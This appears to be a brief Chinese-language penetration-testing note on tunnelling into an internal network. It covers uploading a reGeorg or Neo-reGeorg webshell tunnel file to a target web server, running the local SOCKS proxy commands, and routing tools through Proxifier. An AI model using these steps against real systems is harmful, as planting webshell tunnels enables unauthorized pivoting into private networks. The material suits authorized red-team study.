应用场景

目标不出网

作用

正向代理,通过webshell将流量带入内网

 

regeorg

项目地址



https://github.com/sensepost/reGeorg


使用方法

1、上传 tunnel.(aspx|ashx|jsp|php) 到目标web路径

2、本地



python3 reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp


 

neo-regeorg

regeorg升级版,流量加密

项目地址



https://github.com/L-codes/Neo-reGeorg


使用方法

1、设置密码并生成对应文件



python3 neoreg.py generate -k password


2、上传 tunnel.(aspx|ashx|jsp|php) 到目标web路径

3、本地



python3 neoreg.py -k password -u http://xx/tunnel.php


 

proxifier

regeorg+proxyfier流量代理_python

 

 代理server选择本地对应的regeorg代理端口

regeorg+proxyfier流量代理_python_02

 

rules添加python.exe例外,其他的根据需求选择走代理或是不走

 regeorg+proxyfier流量代理_python_03